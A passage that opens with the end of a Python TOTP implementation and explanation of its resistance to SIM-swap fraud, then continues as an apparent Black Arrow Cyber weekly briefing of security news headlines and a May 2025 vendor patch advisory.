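    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step). Both the
    app and the server compute this locally; nothing is sent by SMS."""
    return hotp(base64.b32decode(secret_b32), at // STEP_SECONDS, digits)


def verify_totp(secret_b32: str, submitted: str, at: int,
                window: int = 1, last_accepted_step: int = -1):
    """Server-side check. Returns the matched time-step index, or None.

    - Accepts the current step and +/- `window` neighbouring steps to tolerate
      clock skew between the phone and the server.
    - Steps at or before `last_accepted_step` are refused, so a code that an
      attacker observed in transit cannot be replayed within its window. The
      caller persists the returned step per user and passes it back next time.
    - hmac.compare_digest keeps the comparison constant-time.
    """
    if not (submitted.isdigit() and len(submitted) == 6):
        return None
    secret = base64.b32decode(secret_b32)
    current = at // STEP_SECONDS
    for delta in range(-window, window + 1):
        step = current + delta
        if step <= last_accepted_step:
            continue  # already used or older than the last accepted code
        if hmac.compare_digest(hotp(secret, step), submitted):
            return step
    return None


if __name__ == "__main__":
    now = int(time.time())
    code = totp(EXAMPLE_SECRET_B32, now)
    print("code for this 30s window:", code)
    print("verified at step:", verify_totp(EXAMPLE_SECRET_B32, code, now))
```

Because the secret lives on the device and the server, transferring the victim's phone number to a new SIM gives the attacker nothing to intercept. The caveat a practitioner should keep in mind is that a TOTP code can still be relayed by a real-time phishing proxy that forwards it to the genuine site within the same 30-second window; where available, phishing-resistant methods such as FIDO2 security keys or passkeys close that gap as well.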
Cyber Threats Outpace Global Readiness
The World Economic Forum has found that cyber threats are accelerating faster than many nations and organisations can respond, with 72% of businesses reporting an increasingly risky environment. Nearly 60% have already revised their cyber security strategies in response to global tensions and emerging threats. Despite progress in areas like infrastructure protection and public-private collaboration, most national approaches remain underdeveloped, especially in supporting small businesses and defining measurable outcomes. Just 14% of organisations feel fully prepared, highlighting a growing skills gap and the need for cyber security to be treated not only as risk mitigation but as a driver of trust and innovation.
CISOs Must Speak Business to Earn Executive Trust
Many business leaders still view cyber security as a barrier to speed and innovation, rather than a business enabler. There’s an argument that this perception must shift, with CISOs framing their role in terms of operational efficiency, resilience, and growth. By automating security controls and embedding them within business functions, CISOs can eliminate bottlenecks while reducing risk. Influence grows when security is expressed in business terms, highlighting revenue protection, risk-adjusted innovation, and customer trust. Effective CISOs use clear data, visual storytelling, and scenario-based dialogue to demonstrate value, helping boards see cyber security as a strategic partner rather than a cost centre.
Downing St Updating Secret Contingencies for Russia Cyber Attack, Report Claims
The UK government is reportedly updating its national defence strategy to reflect the rising threat of state-backed cyber attacks, particularly from Russia. The revised plans will, for the first time, include specific scenarios involving cyber attacks on critical infrastructure such as power grids, gas terminals and undersea cables. The existing contingency plan, last updated in 2005, is considered outdated given today’s cyber threat landscape. A recent risk assessment warned that such attacks could cause civilian casualties and severe disruption to essential services. Ministers are now preparing strategies for maintaining government operations during wartime or major national emergencies.
Sources:
https://www.wired.com/story/north-korean-it-worker-scams-exposed/
https://www.bbc.co.uk/news/articles/cwy382w9eglo
https://corpgov.law.harvard.edu/2025/05/10/ransomware-and-the-boards-role-what-you-need-to-know/
https://www.csoonline.com/article/3980431/more-assets-more-attack-surface-more-risk.html
https://www.infosecurity-magazine.com/news/ransomware-enters-posttrust/
https://www.scworld.com/brief/report-cyber-threats-outpace-global-readiness
Governance, Risk and Compliance
A third of enterprises have been breached despite increased cyber security investment | TechRadar
Why Every CISO Should Be Gunning For A Seat At The Board Table
The CIO Role Is Expanding -- And So Are the Risks of Getting It Wrong
Fostering Resilience in Cybersecurity: Prevent Burnout and Enhance Sec Ops | MSSP Alert
Ransomware and the Board’s Role: What You Need to Know
Report: Cyber threats outpace global readiness | SC Media
CISOs must speak business to earn executive trust - Help Net Security
Cyber cover needs to be a board conversation business chiefs warned
What is business resilience? | Definition from TechTarget
How to Successfully Evaluate IT Project Risk
Tackling threats and managing budgets in an age of AI - Tech Monitor
CIOs paying too much for not enough IT security - survey - TechCentral.ie
Infosec Layoffs Aren't the Bargain Boards May Think
Building Effective Security Programs Requires Strategy, Patience, and Clear Vision
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Enters ‘Post-Trust Ecosystem,’ NCA Cyber Expert Says - Infosecurity Magazine
UK retailers face 10% rises in premiums after cyber attacks
Ransomware and the Board’s Role: What You Need to Know
The ransomware landscape in 2025 | Kaspersky official blog
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Companies take an average of four months to report a ransomware attack
Data Exfiltration is the New Ransomware in Evolving Cyber Landscape
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
Ransomware spreads faster, not smarter - Help Net Security
Ransomware attacks up over 120 percent in two years
BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan
"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine
Threat hunting case study: Medusa ransomware | Intel 471
You think ransomware is bad? Wait until it infects CPUs • The Register
Beware — These Ransomware Hackers Are Watching You Work
Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency
Ransomware Victims
Marks and Spencer could face 12% drop in profits after cyber attacks
M&S to make £100m cyber claim from Allianz and Beazley
UK retailers face 10% rises in premiums after cyber attacks
M&S Admit Customer Data Stolen in Cyber Incident | SC Media UK
What we know about DragonForce ransomware • The Register
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
'They yanked their own plug': How Co-op averted an even worse cyber attack - BBC News
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek
Coinbase Targeted In $20 Million Extortion Plot Tied To Insider Data Leak - FinanceFeeds
Largest US steel manufacturer puts production on the backburner after cyber attack | TechRadar
Nova Scotia Power discloses data breach after March security incident
Security Firm Andy Frain Says 100,000 People Impacted by Ransomware Attack - SecurityWeek
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Phishing & Email Based Attacks
New Phishing Attack Abusing Blob URLs to Bypass SEGs and Evade Analysis
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Focused Phishing: Attack Targets Victims With Trusted Sites and Live Validation
This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar
Email trap exposes 49K stockbroker customer records | Cybernews
Edinburgh schools targeted in cyber attack as pupils passwords reset - Edinburgh Live
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Despite drop in cyber claims, BEC keeps going strong - Help Net Security
Other Social Engineering
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian
Hackers now testing ClickFix attacks against Linux targets
88% of Executives Had Home Floor Plans Available Online | Security Magazine
Fraud, Scams and Financial Crime
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
Fraud Losses Hit $11m Per Company as Customers Abuse Soars - Infosecurity Magazine
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
4 times data breaches ramped up the UK's fraud risk - Which?
European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine
‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian
Deepfake voices of senior US officials used in scams: FBI • The Register
Deepfake attacks could cost you more than money - Help Net Security
International Crime Rings Defraud US Gov't Out of Billions
Artificial Intelligence
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Cisco: Majority of Businesses Unprepared for AI Cyberattacks
NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority
In the AI age, excessive data accumulation is a cyber security threat - Nikkei Asia
Can Cyber Security Keep Up With the AI Arms Race?
AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro
Deepfake voices of senior US officials used in scams: FBI • The Register
Deepfake attacks could cost you more than money - Help Net Security
Why security teams cannot rely solely on AI guardrails - Help Net Security
Over Three Thousand macOS Cursor Users Compromised
Deepfake Defense in the Age of AI
AI vs AI: How cyber security pros can use criminals’ tools against them - Help Net Security
FTC wants a new, segregated software system to police deepfake porn | CyberScoop
Tackling threats and managing budgets in an age of AI - Tech Monitor
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
noyb sends Meta C&D demanding no EU user data AI training • The Register
How To Remove Meta AI From All Your WhatsApp Chats
2FA/MFA
This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar
Malware
Malware landscape dominated by FakeUpdates | SC Media
Over Three Thousand macOS Cursor Users Compromised
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
Bots/Botnets
7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. - Dutch Operation
Police dismantles botnet selling hacked routers as residential proxies
Mobile
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
Denial of Service/DoS/DDoS
AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro
A cyber attack briefly disrupted South African Airways operations
Internet of Things – IoT
UK report uncovers serious security flaws in business IoT devices
Data Breaches/Leaks
Company and Personal Data Compromised in Recent Insight Partners Hack - SecurityWeek
Insight Partners fears secret financial info cyber-stolen • The Register
4 times data breaches ramped up the UK's fraud risk - Which?
Nova Scotia Power discloses data breach after March security incident
Ascension reveals personal data of 437,329 patients exposed in cyberattack
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Email trap exposes 49K stockbroker customer records | Cybernews
Fashion giant Dior discloses cyberattack, warns of data breach
Australian Human Rights Commission Discloses Data Breach - SecurityWeek
160,000 Impacted by Valsoft Data Breach - SecurityWeek
Organised Crime & Criminal Actors
How Security Has Changed the Hacker Marketplace
NatWest facing 100 million cyber attacks each month as experts reveal ‘staggering’ scale... - LBC
Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc
Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data
Coinbase data breach exposes customer info and government IDs
Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek
Telegram shuts ‘largest darknet marketplace to have ever existed’
Insider Risk and Insider Threats
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security
Insider risk management needs a human strategy - Help Net Security
How working in a stressful environment affects cybersecurity - Help Net Security
Insurance
M&S to make £100m cyber claim from Allianz and Beazley
UK retailers face 10% rises in premiums after cyber attacks
Despite drop in cyber claims, BEC keeps going strong - Help Net Security
Cyber cover needs to be a board conversation business chiefs warned
Supply Chain and Third Parties
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine
Cloud/SaaS
Microsoft Listens to Security Concerns and Delays New OneDrive Sync - Security Boulevard
Microsoft Teams will soon block screen capture during meetings
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Identity and Access Management
The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That
Linux and Open Source
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
Hackers now testing ClickFix attacks against Linux targets
Passwords, Credential Stuffing & Brute Force Attacks
The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That
Social Media
Well, Well, Well: Meta to Add Facial Recognition To Glasses After All
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
noyb sends Meta C&D demanding no EU user data AI training • The Register
Regulations, Fines and Legislation
Google Pays $1.375 Billion to Texas Over Unauthorized Tracking and Biometric Data Collection
Why we must reform the Computer Misuse Act: A cyber pro speaks out | Computer Weekly
EU extends cyber sanctions regime amid rising digital threats - EU Reporter
UK Government Publishes New Software and Cyber Security Codes of Practice
NCSC assures CISA relationship unchanged post-Trump • The Register
DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop
10 Reasons Why America Needs a Cyber Force
New cyber security law updates may be on the way
President Trump's Qatari 747 is a flying security disaster • The Register
CISA Reverses Decision on Cyber Security Advisory Changes - Infosecurity Magazine
Update to How CISA Shares Cyber-Related Alerts and Notifications | CISA
US Army Deactivates Only Active-Duty Information Operations Command
What Does EU's Bug Database Mean for Vulnerability Tracking?
CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online
Models, Frameworks and Standards
UN Launches New Cyber-Attack Assessment Framework - Infosecurity Magazine
UK Government Publishes New Software and Cyber Security Codes of Practice
New Cyber Security Certification for Defence Announced
NCSC and industry at odds over how to tackle shoddy software • The Register
Data Protection
noyb sends Meta C&D demanding no EU user data AI training • The Register
Careers, Working in Cyber and Information Security
Most businesses can't fill cyber roles leaving huge gaps in defense | TechRadar
Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe – Krebs on Security
EU Launches Free Entry-Level Cyber Training Program - Infosecurity Magazine
Infosec Layoffs Aren't the Bargain Boards May Think
Law Enforcement Action and Take Downs
Police dismantles botnet selling hacked routers as residential proxies
Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data
European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine
Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc
Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
Nation State Actors
CyberUK 2025: Resilience and APT Threats Loom Large
China
Chinese hackers behind attacks targeting SAP NetWeaver servers
Can Cybersecurity Keep Up With the AI Arms Race?
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
‘Rogue’ devices found in Chinese solar inverters - PV Tech
Ghost in the machine? Rogue communication devices found in Chinese inverters | Reuters
Russia
Downing St updating secret contingencies for Russia cyberattack, report claims – PublicTechnology
Fancy Bear campaign sought emails of high-level Ukrainians and their military suppliers | CyberScoop
Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek
North Korea
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
North Korea ramps up cyberspying in Ukraine to assess war risk
Tools and Controls
CyberUK 2025: Resilience and APT Threats Loom Large
Majority of Browser Extensions Pose Critical Security Risk, A New Report Reveals
DMARC’s Future: Ignoring Email Authentication is No Longer an Option - Security Boulevard
73% of CISOs admit security incidents due to unknown or unmanaged assets | CSO Online
Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security
The browser blind spot: Hidden security risks behind employee web activity - Digital Journal
UK Government Publishes New Software and Cyber Security Codes of Practice
When the Perimeter Fails: Microsegmentation as the Last Line of Defense - Security Boulevard
Cyber cover needs to be a board conversation business chiefs warned
CIOs paying too much for not enough IT security - survey - TechCentral.ie
New UK Security Guidelines Aims to Reshape Software Development
NCSC and industry at odds over how to tackle shoddy software • The Register
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
Government webmail hacked via XSS bugs in global spy campaign
88% of Executives Had Home Floor Plans Available Online | Security Magazine
Why Red Teaming belongs on the C-suite agenda | TechRadar
Pen Testing for Compliance Only? It's Time to Change Your Approach
Tackling threats and managing budgets in an age of AI - Tech Monitor
Building Effective Security Programs Requires Strategy, Patience, and Clear Vision
Other News
A third of enterprises have been breached despite increased cybersecurity investment | TechRadar
Unsophisticated Hackers A Critical Threat, US Government Warns
Will cyber criminals come for accountants next? | AccountingWEB
Critical Infrastructure Siege: OT Security Still Lags
UK report uncovers serious security flaws in business IoT devices
Italy’s G7 drive for unified cyber resilience - Decode39
UK Government cyber 'battlements are crumbling' | Professional Security Magazine
Bluetooth 6.1 released, enhances privacy and power efficiency - Help Net Security
Spain to vet power plants’ cyber security for ‘great blackout’ cause | CSO Online
Departments have underestimated threat posed by cyber attacks, MPs warn
TikTok vs defence: Europe faces a reckoning over the allocation of energy
EU power grid needs trillion-dollar upgrade to avert Spain-style blackouts | Reuters
Students to be offered cyber crime protection training | The Herald
The Vatican’s cyber crusaders – POLITICO
Southwest Airlines CISO on tackling cyber risks in the aviation industry - Help Net Security
Vulnerability Management
SonicWall customers confront resurgence of actively exploited vulnerabilities | CyberScoop
Beyond Vulnerability Management – Can You CVE What I CVE?
Your old router could be a security threat - here's why and what to do | ZDNET
ISO - Configuration management: Why it’s so important for IT security
Malware landscape dominated by FakeUpdates | SC Media
DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop
CISA Reverses Decision on Cybersecurity Advisory Changes - Infosecurity Magazine
EU launches own vulnerability database in wake of CVE funding issues | Cybernews
Why CVSS is failing us and what we can do about it • The Register
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online
EU bug database fully operational as US slashes infosec • The Register
Vulnerabilities
Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server
SonicWall Under Pressure as Security Flaws Resurface | MSSP Alert
Your old router could be a security threat - here's why and what to do | ZDNET
Adobe Patches Big Batch of Critical-Severity Software Flaws - SecurityWeek
Fortinet Patches CVE-2025-32756 Zero-Day RCE Flaw Exploited in FortiVoice Systems
Critical Vulnerabilities in Mitel SIP Phones Let Attackers Inject Malicious Commands
Apple Patches Major Security Flaws in iOS, macOS Platforms - SecurityWeek
Compromised SAP NetWeaver instances are ushering in opportunistic threat actors - Help Net Security
Broadcom urges patching VMware Tools vulnerability | Cybernews
Ivanti warns of critical Neurons for ITSM auth bypass flaw
Ivanti Patches Two EPMM Zero-Days Exploited to Hack Customers - SecurityWeek
BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan
New Chrome Vulnerability Enables Cross-Origin Data Leak via Loader Referrer Policy
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
SAP cyberattack widens, drawing Salt Typhoon and Volt Typhoon comparisons | CyberScoop
Critical SAP NetWeaver Vuln Faces Barrage of Cyber Attacks
SAP patches second zero-day flaw exploited in recent attacks
Commvault Command Center patch incomplete: researcher • The Register
Chipmaker Patch Tuesday: Intel, AMD, Arm Respond to New CPU Attacks - SecurityWeek
CISA Warns of TeleMessage Vuln Despite Low CVSS Score
Flaw in Asus DriverHub makes utility vulnerable to remote code execution | Tom's Hardware
Samsung Patches CVE-2025-4632 Used to Deploy Mirai Botnet via MagicINFO 9 Exploit
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 15 May 2025 – Microsoft, Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom Security Updates
Executive Summary
Microsoft's Patch Tuesday for May 2025 addressed 72 vulnerabilities across its product line, including five actively exploited zero-day vulnerabilities. Notably, critical remote code execution flaws were patched in Microsoft Office, Azure DevOps Server, and the Windows Common Log File System Driver.
Adobe released security updates to address 40 vulnerabilities across several products, including critical issues in Adobe Photoshop, Illustrator, and Bridge. These flaws could lead to arbitrary code execution if exploited.
*Updated to clarify that the two vulnerabilities, CVE-2025-4427 and CVE-2025-4428 relating to Ivanti Endpoint Manager (EPMM) are associated with open-source libraries utilised by EPMM.
Ivanti disclosed multiple vulnerabilities affecting several of its products, including a critical authentication bypass in Ivanti Neurons for ITSM (on-premises). A remote code execution vulnerability, and an authentication bypass vulnerability relating to two open-source libraries that are integrated into Ivanti Endpoint Manager Mobile (EPMM) were also disclosed. Ivanti has reported that the EPMM related vulnerabilities have been exploited in the wild, emphasising the importance of applying the latest patches that address these vulnerabilities to secure affected systems.
Fortinet addressed several vulnerabilities across its product suite, notably patching a zero-day remote code execution flaw (CVE-2025-32756) in FortiVoice systems that was actively exploited. Additional critical updates were released for FortiOS and FortiProxy. Administrators should prioritise these updates to protect against potential exploits.
ASUS issued patches for two critical vulnerabilities (CVE-2025-3462 and CVE-2025-3463) in its DriverHub utility. These flaws could allow attackers to execute arbitrary code via crafted HTTP requests or malicious .ini files. Users of ASUS DriverHub should update to the latest version to mitigate these risks.
Apple released comprehensive security updates across its platforms, addressing several vulnerabilities in iOS, iPadOS, macOS, watchOS, tvOS, and visionOS.
Broadcom released a security update for VMware Tools, addressing an insecure file handling vulnerability (CVE-2025-22247). This flaw could allow a malicious actor with non-administrative privileges on a Windows or Linux guest VM to tamper with local files, potentially leading to unauthorised behaviours within the virtual environment.
Juniper announced fixes for nearly 90 bugs in third-party dependencies in Secure Analytics, the virtual appliance that collects security events from network devices, endpoints, and applications.
Zoom released seven advisories for nine security defects in Zoom Workplace Apps across desktop and mobile platforms. The most severe of the issues is CVE-2025-30663 (CVSS 8.8), a high-severity time-of-check time-of-use race condition that could allow a local, authenticated attacker to elevate their privileges.
What’s the risk to me or my business?
The actively exploited vulnerabilities across these platforms could allow attackers to compromise the confidentiality, integrity, and availability of affected systems and data. Unpatched systems are at heightened risk of exploitation, leading to potential data breaches, system disruptions, and unauthorised access.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on specific updates within this Microsoft patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2025-May
Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom
Further details of the vulnerabilities in the affected Adobe, Fortinet, ASUS, Apple and Zoom products:
https://helpx.adobe.com/security/security-bulletin.html
https://fortiguard.fortinet.com/psirt
https://www.asus.com/content/asus-product-security-advisory/
https://support.apple.com/en-us/100100
https://www.zoom.com/en/trust/security-bulletin/
#threatadvisory #threatintelligence #cybersecurity